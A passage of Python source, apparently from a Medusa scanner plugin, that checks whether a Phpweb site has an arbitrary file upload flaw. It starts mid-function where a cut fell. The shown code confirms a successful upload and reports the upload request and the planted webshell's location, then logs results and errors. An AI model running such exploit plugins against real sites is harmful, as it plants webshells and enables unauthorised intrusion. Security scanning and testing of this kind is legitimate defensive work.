con3 = resp3.text
if code3 == 200 and con3.find(ran) != -1:
Medusa = "{} 存在Phpweb前台任意文件上传漏洞\r\n漏洞地址:\r\n上传位置:\r\n{}\r\n上传数据包:\r\n{}\r\nwebshell位置:\r\n{}\r\n漏洞详情:\r\n{}".format(
url, payload_url2, dada2, payload_url3, con3)
_t = VulnerabilityInfo(Medusa)
ClassCongregation.VulnerabilityDetails(
_t.info, url, **kwargs).Write() # 传入url和扫描到的数据
ClassCongregation.WriteFile().result(
str(url), str(Medusa)) # 写入文件,url为目标文件名统一传入,Medusa为结果
except Exception as e:
_ = VulnerabilityInfo('').info.get('algroup')
ClassCongregation.ErrorHandling().Outlier(e, _)
_l = ClassCongregation.ErrorLog().Write(
"Plugin Name:" + _ + " || Target Url:" + url, e) #调用写入类
